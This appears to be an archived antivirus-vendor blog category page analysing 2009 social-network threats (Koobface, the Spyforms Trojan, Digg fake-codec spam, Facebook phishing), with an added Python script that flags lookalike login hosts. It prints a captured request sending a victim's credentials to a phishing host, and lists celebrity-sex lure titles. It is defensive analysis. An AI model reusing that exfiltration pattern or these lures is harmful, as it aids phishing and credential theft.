Archive for the ‘Social Networks’ Category

Welcome to Super Antivirus Blog

December 17, 2009

I am a Jedi. http://sinaurl.cn/hiWzC Simplify the complex… emerge from the cocoon as a butterfly. Panda Cloud Antivirus, the first free cloud-based antivirus software.

Koobface: The saga continues

August 13, 2009

The gang behind the Koobface worm has been hard at work in releasing the next iteration of their worm. We've already identified over 60 active domains spreading the content through the usual method of posting a message linking to a "CooooL Video" on Facebook.

Sample malspam:

Koobface Link

After clicking the link, the victims are automatically redirected to a Koobface-controlled server, which then routes them off to a fake codec site specifically designed for the social network they came from.

Fake codec site:

The Koobface gang uses the same old "Flash Player upgrade required" tactic to trick users into opening the executable, which then ultimately transforms their machine into a distribution point for the infection to further propagate. 

Koobface Site

Koobface connection log:

Koobface connection log

On infection, the Koobface worm immediately attempts to download three additional executable files.

Koobface on infection

After turning the victim's computer into its next distribution point, it also attempts to monetize the infection by installing "Total Security" rogueware.

Adware/TotalSecurity

Malware Impersonates Classmates and Facebook Websites to Deliver Password Stealing Trojan

March 12, 2009

Websites designed to look like Classmates.com and Facebook are currently being used to distribute a password-stealing Trojan, which we detect as Trj/Spyforms.BZ. Some of you may remember the Spyforms malware family from a previous incident involving Barack Obama spam campaigns. In this most recent incident, the malicious web links are still primarily distributed via spam e-mails. Once clicked, the victim is presented with a realistic-looking Classmates or Facebook website. The website contains a fake YouTube video, which prompts a dialog stating “Please Download correct Flash Movie Player! Installation: Double-click the downloaded installer. Follow the on-screen instructions!” and attempts to download a file named Adobemedia10.exe or Adobemedia11.exe.

Fake Classmates.com Malware Site

Fake Facebook Malware Site

Once installed, the Trojan intercepts network traffic in order to obtain FTP, ICQ, POP3, and IMAP passwords and then sends the data back to a server at a Hong Kong-based ISP (HOSTFRESH). You may recall the last major malware incident involving this Hong Kong-based ISP, which was one of the providers involved in the malware distribution operation taking place inside the Atrivo/Intercage network.

Ever heard the term "Rickrolling"? Malware distributors have…

February 9, 2009

Rickrolling is an Internet meme typically involving the music video for the 1987 Rick Astley song "Never Gonna Give You Up". The meme is a bait and switch: a person provides a web link that he or she claims is relevant to the topic at hand, but the link actually takes the user to the Astley video.

Over the past few months we have noticed attackers trying to maximize blackhat SEO tactics and increase infection rates at the same time by abusing the popular social news aggregator site Digg.com. Digg allows users to create, vote on, and comment on news stories.

Malware distributors have been creating false stories with catchy subject lines in an attempt to bait users into clicking links which lead to malware. In some cases the attackers do not create the news story themselves, but instead link from others' relevant content. Below is an example of the attacker (in red) taking advantage of a valid Digg submission. The malicious comment reads, "Heath Ledger naked in the shower, playing with herself." and is posted to a relevant story about Heath Ledger. The "playing with herself" part is a bit confusing, but my guess is that the attackers are using automation scripts to auto-generate content based on topic relevancy, or that they are doing this manually and have no idea who Heath Ledger is.

Example on Digg

My initial search identified 52 accounts posting news stories or comments with malicious URIs. The links all point to various fake codec sites, which lead to rogue anti-malware infections. We detect and block the malware as Adware/VideoPlay.

Update: Dancho Danchev reported that there have been over 500,000 malicious comments posted via Digg since last year.

Some of the titles include:

Christian Bale freak out dubbed with video!
Christian Bale Terminator Salvation Takes it Up the Ass
Hot and sexy model Mayuko Lwasa in bikini
Pregnant Ujwala Raut in Bikini
megan fox naked secret videos
Sexy Megan Fox having sex Sex Tape, rally nice and hot video
Megan Fox naked NEW SEX TAPE
Robert Pattinson: fotos, vídeos, história
Jessica Simpson Hotel Sex Tape
Batman is Naked aka Christian Bale
Watch Grey's Anatomy Season 5 online here
Breaks Season 4 Episode 9
Emma Watson Nude Video
Watch Emma Watson Sex Tape online here
Paris Hilton Sex Tape Update
VANESSA ANNE HUDGENS NUDE, NAKED GALLERY, EXCLUSIVE 2009
Naked Truth on Celebrity News and Edison Chen Sex Scandal
Paris Hilton sex tape! Paris Hilton nude, naked movie!
Celebrity and Angelina Jolie nude, naked, in bikini, gallery
Tila Tequila topless nude and naked sex-porn gallery
Alyssa Milano nude, naked, sex tape – free gallery!
BRITNEY SPEARS NUDE, BRITNEY SPEARS NAKED & SEX TAPE (CLICK HERE)
Lindsay Lohan's nude Marilyn shoot
Heath Ledger naked in shower, playing with herself!!

Fake Codec Sites: 

Types of Fake Media Codec Pages


New Version of MS Antispyware 2009

Rogue Infections


Facebook Phishing Site Targets French Users

February 5, 2009

Today I discovered a new Facebook phishing site targeting French users. The login page looks identical to the official Facebook site, but the phishing site passes the victim's credentials through a submission form before redirecting them to the official Facebook login site.

Fake Facebook Login Page

Source:

source code to phishing page

Connection:

(Passing the victim's credentials over to the attacker)

GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F

(Redirecting to the official Facebook login page)

302 Moved Temporarily to https://login.facebook.com/login.php


Even though this is a run-of-the-mill phishing attack, we have noticed an uptrend in phishing attacks, especially on social networks. The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full-blown malware campaigns.

Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

  • Remember, Facebook will never ask for your password in an email, Facebook message, or any medium that isn't the login page. Though you will need to re-enter your password when you set a security question, change your contact email, or send a virtual gift.
  • Be extra aware of weird Wall posts. Don't click on any links—on a Wall or elsewhere—if you don't know where they go.
  • Set a security question for yourself on your Account page. If somehow something malicious shuts you out of your account, you will need the answer to that question in order for our User Operations team to let you back in. (If you've already set your security question, you won't see a prompt for it on your Account page.)
  • Be extra aware of what website you are using to log in to Facebook (and other websites). Phishing websites can be made to look like other websites (like the Facebook log in page), and might try to disguise their URLs. Be smart: http://www.facebook.com.profile.a36h8su2m8.info/login starts out looking like a legitimate Facebook website, but that a36h8su2m8.info part means it's fraudulent. Set and use a browser bookmark to make sure you always log in from facebook.com
  • If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
  • Use a modern web browser to benefit from anti-phishing protection
  • Check out opendns.com. This is another method for blocking specific domains that host phishing sites.

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.
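As an added example (not code from the original post), the two checks a defender would script from the connection log and the lookalike-URL tip above: does the request's host actually belong to facebook.com, and are login credentials travelling in a GET query string? The sample request line is constructed to mirror the log entry; the credential key list and the last-two-label domain rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample, modelled on the connection log above (analyst-style "hxxp" defanging kept).
SAMPLE_REQUEST = ("GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4"
                  "&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe")

LEGIT_DOMAINS = {"facebook.com"}                     # where a Facebook login may legitimately go
CREDENTIAL_KEYS = {"email", "pass", "password", "passwd", "login"}   # assumed parameter names


def refang(url):
    """Turn the hxxp/hxxps defanging used in write-ups back into a parseable scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def registrable_domain(host):
    """Naive last-two-label rule (no public-suffix list); enough for the .com/.info lookalikes here."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def analyse_request(request_line):
    """Flag lookalike hosts and credentials leaked in a GET query string for one log request line."""
    tokens = request_line.split()                    # e.g. ["GET", "<url>", "HTTP/1.1"]
    method, url = tokens[0].upper(), tokens[1]
    parts = urlsplit(refang(url))
    host = parts.hostname or ""
    params = parse_qs(parts.query, keep_blank_values=True)
    leaked = sorted(k for k in params if k.lower() in CREDENTIAL_KEYS)
    domain = registrable_domain(host)
    return {
        "host": host,
        "registrable_domain": domain,
        # "facebook" appears in the name but the registrable domain is not facebook.com
        "lookalike": "facebook" in host.lower() and domain not in LEGIT_DOMAINS,
        # credentials in a GET query string end up in proxy and server logs in clear text
        "credentials_in_query": method == "GET" and bool(leaked),
        "leaked_params": leaked,
    }


if __name__ == "__main__":
    for line in (SAMPLE_REQUEST,
                 "GET http://www.facebook.com.profile.a36h8su2m8.info/login HTTP/1.1",
                 "POST https://login.facebook.com/login.php HTTP/1.1"):
        print(analyse_request(line))
```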